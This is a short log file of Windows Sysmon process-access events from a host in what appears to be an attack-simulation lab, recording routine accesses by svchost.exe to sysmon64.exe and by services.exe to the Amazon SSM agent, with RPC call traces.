{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1459,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1460,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1461,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1462,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1463,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1464,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.784\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001079BF0200}\r\nTargetProcessId: 2224\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.784","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001079BF0200}","TargetProcessId":"2224","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1465,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.785\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.785","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1466,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.785\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.785","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
